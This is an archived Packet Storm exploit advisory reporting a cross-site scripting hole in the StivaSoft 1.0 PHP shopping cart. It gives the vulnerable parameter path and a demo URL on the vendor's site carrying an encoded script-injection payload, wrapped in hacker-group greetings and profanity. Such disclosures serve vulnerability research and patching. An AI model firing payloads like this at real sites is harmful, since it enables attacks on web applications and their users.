StivaSoft 1.0 Cross Site Scripting

2010-01-14T00:00:00
ID PACKETSTORM:85091
Type packetstorm
Reporter PaL-D3v1L
Modified 2010-01-14T00:00:00

Description

                                        
                                            `  
[?] ~ Note : PaLesTine r0x !  
==============================================================================  
[?] StivaSoft 1.0 (XSS) Multiple Remote Vulnerabilities  
==============================================================================  
[?]Love to: [N0 L0ve]  
[?] Script: [StivaSoft 1.0]  
[?] Language: [ PHP ]  
[?] Vendor [stivashoppingcart.com]  
[?] Founder: [ ./PaL-D3v1L ]  
[?] Gr44tz to: [ All my Frindes ]  
[?] Fuck To : [ World <   
########################################################################  
==============================================================================  
  
===[ Exploit XSS ]===  
  
[»]Exploit : [Path]/demo.php?id=[XSS Vuln]  
  
[»]dem0:http://stivashoppingcart.com/demo.php?id=18&p=1&cat=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
==============================================================================  
  
#PaL-D3v1L Str1kEz y0u !  
`